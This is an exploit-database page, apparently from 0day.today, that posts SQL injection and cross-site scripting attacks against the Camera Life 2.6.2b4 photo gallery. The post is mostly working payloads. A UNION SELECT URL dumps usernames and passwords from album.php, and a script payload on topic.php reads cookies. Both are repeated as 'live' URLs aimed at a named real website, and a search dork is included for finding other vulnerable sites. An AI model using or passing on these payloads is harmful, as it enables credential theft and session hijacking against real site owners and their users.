[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities

Author
BackDoor
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3863
Category
web applications
Date add
08-10-2008
Platform
unsorted
=============================================================
Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
=============================================================


Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
Script:Cameralife 2.6.2b4
Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
Author:BackDoor
Bug 1;album.php Remote SQL Injection Vulnerability
Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Live
http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Bug 2;topic.php XSS Vulnerability
Exploit:www.target.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
Live
http://chrisnolan.org/cameralife/topic.php?name="><script>alert(document.cookie)</script>
Dork:inurl:"cameralife/index.php"


#  0day.today [2024-11-15]  #